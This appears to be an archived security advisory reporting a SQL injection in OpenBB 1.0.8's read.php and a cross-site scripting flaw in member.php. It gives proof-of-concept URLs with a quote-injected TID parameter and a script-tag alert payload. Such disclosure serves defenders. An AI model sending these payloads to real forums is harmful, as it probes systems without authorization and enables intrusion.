Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: hack7506.htm

OpenBB SQL Injection & Cross-site Scripting vuln



OpenBB SQL Injection & Cross-site Scripting Vulnerability



Open Bulletin Board 
www.openbb.com 

Vulnerable versions: 1.0.8

* OpenBB read.php SQL Injection Vulnerability                     

Proof of concept: 
http://www.example.com/openbb/read.php?action=lastpost&TID=' 
http://www.example.com/openbb/read.php?TID=' 


* OpenBB member.php Cross-Site Scripting Vulnerability

Proof of concept: 
http://www.example.com/member.php?action=list&page=2&sortorder=u sername&perpage=25&reverse="><script>alert('test');</script>


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH